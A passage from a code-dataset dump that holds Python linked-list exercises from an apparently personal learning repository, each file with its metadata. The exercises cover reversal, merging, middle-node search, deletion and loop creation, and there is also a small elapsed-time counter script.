l2.reverse()\n return l2\nif __name__ == \"__main__\":\n l = main()\n l.display()\n"
},
{
"alpha_fraction": 0.49111807346343994,
"alphanum_fraction": 0.5005224943161011,
"avg_line_length": 23.564102172851562,
"blob_id": "8352734addcef05eb0d69d81e62f6cbd1109f46c",
"content_id": "3c45a4009088ee247bdb252fd4c37dbb3a342af8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 957,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 39,
"path": "/40_loop_linkedList.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass modLinkedList(LinkedList):\n def display(self , l):\n temp = self.head\n if not temp:\n print(\"Linked list is empty ..\")\n return\n print(\"Linkedlist is : \",end=\"\")\n for _ in range(l+4):\n print(temp.val , end=\"->\")\n temp = temp.next\n if not temp:\n print(\"NULL\")\n return\n print(\"......\")\n \ndef createLoop(head , k):\n node = prev = None\n c = 1\n while head:\n if c == k:\n node = head\n c+=1\n prev = head\n head = head.next\n if not node:\n return\n prev.next = node\ndef main():\n l1 = modLinkedList()\n CreateLinkedList(l1)\n l = l1.length()\n l1.display(l)\n k = int(input(\"Enter the value of k : \"))\n createLoop(l1.head , k)\n l1.display(l)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.547325074672699,
"alphanum_fraction": 0.5665295124053955,
"avg_line_length": 22.516128540039062,
"blob_id": "83354662f9187255c404a2f48e7b52d7b8fffd9e",
"content_id": "eff9434671b915cb0e7467920233301f60162b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 729,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 31,
"path": "/23_find_middle.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef find_middle(L):\n LEN = L.length()\n if LEN % 2 != 0:\n LEN = LEN - 1\n pos = LEN // 2\n head = L.head\n for _ in range(pos):\n head = head.next\n return head\n\ndef find_middle_method2(head):\n count = 0\n node = head \n while head:\n if (count & 1) == 1:\n node = node.next\n count += 1\n head = head.next\n return node\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n node = find_middle(l1)\n print(\"Value of middle node is : \",node.val)\n node = find_middle_method2(l1.head)\n print(\"Value of middle node is : \", node.val)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4457477927207947,
"alphanum_fraction": 0.47214075922966003,
"avg_line_length": 23.95121955871582,
"blob_id": "ef7ed5e35066222bb135fec2f85dc8d412adde82",
"content_id": "6ca2dddc9ce0257449032ca5cf1da9a0c1de1e9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 41,
"path": "/9_delte_linkedlist.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nclass linkedlistmod(LinkedList):\n def delete(self,val):\n if not self.head:\n return False\n elif self.head.val == val:\n temp = self.head\n self.head = self.head.next\n del temp\n self.delete(val)\n else:\n prev = self.head\n next = self.head.next\n while next:\n if next.val == val:\n prev.next = next.next\n temp = next\n del temp\n next = prev.next\n else:\n prev = next\n next = next.next\ndef main():\n l1 = linkedlistmod()\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(2)\n l1.insert_end(3)\n l1.insert_end(5)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.display()\n l1.delete(1)\n l1.display()\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.48428836464881897,
"alphanum_fraction": 0.49722737073898315,
"avg_line_length": 23.590909957885742,
"blob_id": "801efa1523e2c31e3f53f5721e468943d87a6097",
"content_id": "18ad3a6113244deb780cb593ca65cbeac7368400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 22,
"path": "/4_decimal_equi.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nclass ModList(LinkedList):\n def binary_equ(self):\n l = self.length() - 1\n temp = self.head\n ans = 0\n while temp:\n ans += ((2**l) * temp.val)\n temp = temp.next\n l -= 1\n return ans\n\ndef main():\n print(\"Enter the number : \",end=\"\")\n num = [int(x) for x in input().split(\" \")]\n l1 = ModList()\n for i in num:\n l1.inset_end(i)\n print(\"Binary equivalent is : \",l1.binary_equ())\n \nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6109890341758728,
"alphanum_fraction": 0.6219780445098877,
"avg_line_length": 25.823530197143555,
"blob_id": "45b20b57a3579c2527c674d0c2af88eedddadcae",
"content_id": "8dbead54a42c3bfcba327c90632d364645cabf80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 455,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/17_remove_linked_list.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass LinkedListMod(LinkedList):\n def remove_allnode(self):\n while self.head:\n temp = self.head\n self.head = self.head.next\n del temp\ndef main():\n l1 = LinkedListMod()\n CreateLinkedList(l1)\n l1.display()\n print(\"Remove the Linked List.....\")\n l1.remove_allnode()\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5358744263648987,
"alphanum_fraction": 0.5493273735046387,
"avg_line_length": 22.526315689086914,
"blob_id": "6c23b3bb43a6834aa88e1f3b01ba3f72c874271d",
"content_id": "a9576e5fdb88370fb6393b337eae64466e86c6e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/31_linked_list_modulo.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef get_ans(head , k):\n ans = None\n c = 1\n while head:\n if c % k == 0:\n ans = head\n head = head.next\n c += 1\n return ans.val\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n k = int(input(\"Enter the value of k : \"))\n ans = get_ans(l1.head , k)\n print(\"Ans : \",ans)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.595652163028717,
"alphanum_fraction": 0.602173924446106,
"avg_line_length": 26.058822631835938,
"blob_id": "3f9dbdd1aa1b1e329e6da3b768823c1bc5bbea2f",
"content_id": "3fc6d9de9e1af88c830989b5d35f4909dd6a6103",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 17,
"path": "/53_alternate_rec.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef print_alternative(head , t):\n if not head:\n return\n else:\n if t:\n print(head.val , end=\" \")\n t = not t\n return print_alternative(head.next, t)\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Linkedlist is (alternative ) : \",end=\"\")\n print_alternative(l1.head , True)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5809312462806702,
"alphanum_fraction": 0.5942350625991821,
"avg_line_length": 20.5238094329834,
"blob_id": "9f2c0577f17e91418a298f83b8bcd80e6e78951f",
"content_id": "592d37d908d67c2cd0db0508c595f680b9f8fbe8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 21,
"path": "/22_reverse_list.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef reverse(head):\n if not head:\n return None\n prev = None\n next = None\n while head:\n next = head.next\n head.next = prev\n prev = head\n head = next\n return prev\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = reverse(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5717488527297974,
"alphanum_fraction": 0.5896860957145691,
"avg_line_length": 22.473684310913086,
"blob_id": "f8b88c312084bff541da06054528ec0c228d1538",
"content_id": "9cfe5c1d4d2ea43872e932f209b0fd8bacc052eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/54_reverse_word.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef rev(s):\n STR = \"\"\n for i in range(len(s)-1 , -1 , -1):\n STR += s[i]\n return STR\ndef reverse_list(head):\n while head:\n head.val = rev(head.val)\n head = head.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1 , func=str)\n l1.display()\n reverse_list(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5511482357978821,
"alphanum_fraction": 0.5699373483657837,
"avg_line_length": 20.81818199157715,
"blob_id": "8229622378be65e56e08b273ed9d614f64199a62",
"content_id": "6b3d34007c81ac2104535f14e7c8c85adf52508e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 22,
"path": "/32_middle_delete.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef deleteMiddle(head):\n prev = None\n mid = head\n count = 0\n while head:\n if count & 1 == 1:\n prev = mid\n mid = mid.next\n head = head.next\n count += 1\n prev.next = mid.next\n del mid\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n deleteMiddle(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6144278645515442,
"alphanum_fraction": 0.6293532252311707,
"avg_line_length": 24.1875,
"blob_id": "40ff8f72adea56e59a34ce43db8e161db831c49c",
"content_id": "16eca1bdad52e384f98f4273389731036323a7f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 402,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 16,
"path": "/36_count_rotate_sort.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef count_rotate(head):\n count = 0\n while head.next and head.val < head.next.val:\n count += 1\n head = head.next\n count += 1\n return count\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n count = count_rotate(l1.head)\n print(\"Count = \",count)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6157894730567932,
"alphanum_fraction": 0.6263157725334167,
"avg_line_length": 24.399999618530273,
"blob_id": "1ef43f82030eec34b94e67b295dc28e1b16113bb",
"content_id": "51083d186f521d91143a3cf5755befc9a0d58336",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/15_linkedlist_reverse.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef reverse_list(head):\n if not head:\n return\n reverse_list(head.next)\n print(head.val,end=\" \")\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n if l1.head:\n print(\"Rev of linked list : \",end=\"\")\n reverse_list(l1.head)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.4487534761428833,
"alphanum_fraction": 0.4598338007926941,
"avg_line_length": 23.89655113220215,
"blob_id": "fa03f2b8dee3a790068bd9b2aa526a9f0d158a57",
"content_id": "daac681bb37ca79f93206af47f43ddd8a5181fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 722,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 29,
"path": "/46_non_repeat.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef findNumber(head):\n h = {}\n c = 0\n while head:\n if head.val not in h:\n h[head.val] = {} \n h[head.val]['count'] = 0\n h[head.val]['pos'] = c\n c += 1\n h[head.val]['count'] += 1\n head = head.next\n ans = None\n # print(h)\n for i in h:\n if h[i]['count']==1:\n if ans==None:\n ans = i\n else:\n if h[ans]['pos']>h[i]['pos']:\n ans = i\n return ans\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Number is : \",findNumber(l1.head))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5936073064804077,
"alphanum_fraction": 0.6095890402793884,
"avg_line_length": 22.052631378173828,
"blob_id": "ae5da8aaac8cd223facf76eb3917e48932664f38",
"content_id": "6e4c3feb1daaa3b3f28ed8e2d6f74a2f359464df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/51_delete_alternate_node.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef delete_alternative(l1):\n head = l1.head\n if not head:\n return\n while head:\n if not head.next:\n return\n head.next = head.next.next\n head = head.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n delete_alternative(l1)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.41407033801078796,
"alphanum_fraction": 0.45929649472236633,
"avg_line_length": 22.690475463867188,
"blob_id": "676b5a82537b25268ac7216c5c87d557fc7ba203",
"content_id": "5bb7a7d6d46d8bb95ce8e918f2ab941364787dfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 995,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 42,
"path": "/19_add_number.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef add(l1,l2):\n l1 = l1.head\n l2 = l2.head\n new_ll = LinkedList()\n carry = 0\n while l1 or l2 or carry!=0:\n if l1 and l2:\n s = l1.val+l2.val+carry\n carry = s // 10\n s = s % 10\n new_ll.insert_end(s)\n l1 = l1.next\n l2 = l2.next\n elif l1:\n s = l1.val+carry\n carry = s // 10\n s = s % 10\n new_ll.insert_end(s)\n l1 = l1.next\n elif l2:\n s = l2.val+carry\n carry = s // 10\n s = s % 10\n new_ll.insert_end(s)\n l2 = l2.next\n else:\n new_ll.insert_end(carry)\n carry = 0\n return new_ll\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l2 = LinkedList()\n CreateLinkedList(l2)\n result = add(l1,l2)\n result.display()\n \n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5797752737998962,
"alphanum_fraction": 0.5977528095245361,
"avg_line_length": 22.421052932739258,
"blob_id": "efbdbde706a5abea2ee066d46ac3d6b3e0c44de6",
"content_id": "aa185b75c7607211cec48dfae473c728b510eb0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 19,
"path": "/14_index_ll.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef getNth(head, k):\n count = 0\n temp = head\n while count < k-1 and temp:\n temp = temp.next\n count += 1\n if not temp:\n return -1\n return temp.val\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Item : \", getNth(l1.head, int(input(\"Enter the index : \"))))\n return 0\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4577777683734894,
"alphanum_fraction": 0.5013333559036255,
"avg_line_length": 25.785715103149414,
"blob_id": "9919145077ee181cad2633bcf7e9ac09713d9d25",
"content_id": "a7140606fc456edf7acc51fa5ab6f3cc293ec120",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1125,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 42,
"path": "/52_sort_012.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef sort_012(l1):\n pointer0 = pointer1 = pointer2 = None\n temp0 = temp1 = temp2 = None\n head = l1.head\n while head:\n if head.val==0:\n if pointer0==None:\n pointer0 = head\n temp0 = pointer0\n else:\n pointer0.next = head\n pointer0 = pointer0.next\n elif head.val == 1:\n if pointer1 == None:\n pointer1 = head\n temp1 = pointer1\n else:\n pointer1.next = head\n pointer1 = pointer1.next\n else:\n if pointer2 == None:\n pointer2 = head\n temp2 = pointer2\n else:\n pointer2.next = head\n pointer2 = pointer2.next\n head = head.next\n pointer0.next = temp1\n pointer1.next = temp2\n pointer2.next = None\n l1.head = temp0\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n sort_012(l1)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5345528721809387,
"alphanum_fraction": 0.5508130192756653,
"avg_line_length": 22.4761905670166,
"blob_id": "9802965137cc264cd6591564049a61fe1c2dddf4",
"content_id": "ab5c22e01b46413c3d64067a138073e6d027411b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 21,
"path": "/49_sort.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef sort_ll(l1):\n head = l1.head\n while head.next:\n if head.next.val < 0:\n val = head.next.val\n head.next = head.next.next\n l1.insert_beg(val)\n temp = head.next\n del temp\n else:\n head = head.next\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n sort_ll(l1)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6022944450378418,
"alphanum_fraction": 0.6367112994194031,
"avg_line_length": 26.578947067260742,
"blob_id": "2f4eb9eb1c6d350725366332165c5eb4ff7dadfa",
"content_id": "02bb6bdbff16ef6b38fa0625dae7bc0b6566567e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 19,
"path": "/41_identical.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef isIdentical(head1,head2):\n while head1 and head2:\n if head1.val != head2.val:\n return False\n head1 = head1.next\n head2 = head2.next\n if not head1 and not head2:\n return True\n return False\ndef main():\n l1 = LinkedList()\n l2 = LinkedList()\n CreateLinkedList(l1)\n CreateLinkedList(l2)\n print(\"Is identical : \",isIdentical(l1.head , l2.head))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5973333120346069,
"alphanum_fraction": 0.6133333444595337,
"avg_line_length": 21.117647171020508,
"blob_id": "1da92ba8bfafcddd68f1db03f126479326e12812",
"content_id": "6d818b922dab7ecd7d2c391b8c2901a9ba14ba66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/39_delete_recursion.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef delete(head):\n if not head:\n return None\n else:\n temp = head.next\n del head\n return delete(temp)\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = delete(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5163043737411499,
"alphanum_fraction": 0.5625,
"avg_line_length": 25.285715103149414,
"blob_id": "f1c54f234b47b962339c32273c451e44445008aa",
"content_id": "cc8334db03746808cfcffd559e1377618c8bacb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 736,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 28,
"path": "/21_merge_list.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef merge(head1 , head2):\n l1 = LinkedList()\n while head1 or head2:\n if not head1:\n l1.insert_end(head2.val)\n head2 = head2.next\n elif not head2:\n l1.insert_end(head1.val)\n head1 = head1.next\n elif head1.val > head2.val:\n l1.insert_end(head2.val)\n head2 = head2.next\n else:\n l1.insert_end(head1.val)\n head1 = head1.next\n return l1\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l2 = LinkedList()\n CreateLinkedList(l2)\n l3 = merge(l1.head , l2.head)\n l3.display()\n \nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5588235259056091,
"alphanum_fraction": 0.5906862616539001,
"avg_line_length": 23.058822631835938,
"blob_id": "15f17c3d82b9d65d8df99089b493d0922e3e7b4c",
"content_id": "e812f9c8798e98dbc408f92a508eed678b8bcb42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 408,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 17,
"path": "/8_insert_front.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList, Node\nclass linkedListMod(LinkedList):\n def insert_beg(self , val=0):\n new_node = Node(val)\n new_node.next = self.head\n self.head = new_node\ndef main():\n l1 = linkedListMod()\n l1.insert_beg(5)\n l1.insert_beg(6)\n l1.insert_beg(7)\n l1.insert_end(8)\n l1.display()\n l1.reverse()\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.45668449997901917,
"alphanum_fraction": 0.49625667929649353,
"avg_line_length": 22.174999237060547,
"blob_id": "0e13bb6c7beeb67794619f99837a809fb841b6cc",
"content_id": "73300b8baa08c57c512991cede360e700b4a0629",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 935,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 40,
"path": "/0_AddTwoNum.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def getNumber(self,l):\n num = 0\n i = 0\n temp = l\n while temp:\n num = num + ((10**i)*temp.val)\n temp = temp.next\n i+=1\n return num\n def addTwoNumbers(self, l1 , l2):\n num1 = self.getNumber(l1)\n num2 = self.getNumber(l2)\n add = num1+num2\n l = ListNode(add%10)\n temp = l\n add = add // 10\n while add!=0:\n l.next = ListNode(add%10)\n l = l.next\n add = add // 10\n return temp\n \n\nl1 = ListNode(2)\nl1.next = ListNode(4)\nl1.next.next = ListNode(3)\n###############\nl2 = ListNode(5)\nl2.next = ListNode(6)\nl2.next.next = ListNode(4)\nl = Solution().addTwoNumbers(l1,l2)\nwhile l:\n print(l.val)\n l = l.next\n "
},
{
"alpha_fraction": 0.6211812496185303,
"alphanum_fraction": 0.6334012150764465,
"avg_line_length": 23.450000762939453,
"blob_id": "f35498850d183fe027b291bdf5faa63cde2aa6d6",
"content_id": "152cbbd640902550216733b25aedfa26d0b94c7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 20,
"path": "/33_move_last_node.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef move_tail(head):\n if not head or not head.next:\n return head\n temp_head = head\n while head.next.next:\n head = head.next\n temp_node= head.next\n head.next = None\n temp_node.next = temp_head\n return temp_node\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = move_tail(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n\n\n"
},
{
"alpha_fraction": 0.45842957496643066,
"alphanum_fraction": 0.49191686511039734,
"avg_line_length": 25.24242401123047,
"blob_id": "b06ee395bb2f5da31f46bf874c1dfe235e97a034",
"content_id": "f1d7f84c943eec1dec405768e51acf5d88ad8694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 866,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 33,
"path": "/alone.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "import datetime \nimport time\ndef alone():\n now = datetime.datetime.now()\n a = datetime.datetime(now.year, now.month, now.day,\n now.hour, now.minute, now.second)\n b = datetime.datetime(2021, 1, 1, 23, 56, 10) \n c = a-b\n sec = int(c.total_seconds() % 60)\n s = \" seconds \"\n if sec==1:\n s = \" second \"\n minutes = c.total_seconds() // 60\n hours = minutes // 60\n minutes = int(minutes % 60)\n m = \" minutes \"\n if minutes==1:\n m = \" minutes \"\n days = int(hours // 24)\n d = \" days \"\n if days==1:\n d = \"day\"\n hours = int(hours % 24 )\n h = \" hours \"\n if hours==0:\n h = \" hour \"\n print(\"Alone : \"+str(days)+d+str(hours)+h+str(minutes)+m+str(sec)+s)\ndef main():\n while True:\n alone()\n time.sleep(1)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5327978730201721,
"alphanum_fraction": 0.5662650465965271,
"avg_line_length": 23.09677505493164,
"blob_id": "91836191ce1847c6e9c3b156122ac6e063ab815f",
"content_id": "281e9089d8316d1f2359adc2a822ea6a2cab3420",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 31,
"path": "/34_insert_linkedList.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef insert(head1 , head2 , k):\n c = 1\n while head1 and c<=k-1:\n head1 = head1.next\n c += 1\n if not head1:\n return\n temp = head1.next\n last_node = None\n while head2:\n last_node = head1\n head1.next = head2\n head1 = head1.next\n head2 = head2.next\n while temp:\n last_node.next = temp\n temp = temp.next\n last_node = last_node.next\n \ndef main():\n l1 = LinkedList()\n l2 = LinkedList()\n CreateLinkedList(l1)\n CreateLinkedList(l2)\n k = int(input(\"Enter the value of k : \"))\n insert(l1.head , l2.head , k)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6096997857093811,
"alphanum_fraction": 0.6212471127510071,
"avg_line_length": 24.52941131591797,
"blob_id": "142904b96d8918ffdd530bd557c1b27a1e001b99",
"content_id": "230aa71626ede1683b4280505decb0760f2e05d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/30_remove_duplicates.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef remove_duplicates(head):\n while head:\n temp = head.next\n while temp and temp.val==head.val:\n temp = temp.next\n head.next = temp\n head = head.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n remove_duplicates(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5638095140457153,
"alphanum_fraction": 0.569523811340332,
"avg_line_length": 24.047618865966797,
"blob_id": "a3d9844fb97f18dc6c3f644a70aedc6900573af8",
"content_id": "548075ed84601508677a35ef98e518c20777d064",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 21,
"path": "/29_smallest_large.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef find_max_min(head):\n if not head:\n return None , None\n MAX = MIN = head.val\n while head:\n if head.val>MAX:\n MAX = head.val\n elif head.val < MIN:\n MIN = head.val\n head = head.next\n return MAX , MIN\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n MAX , MIN = find_max_min(l1.head)\n print(\"MAX = \",MAX)\n print(\"MIN = \",MIN)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5973742008209229,
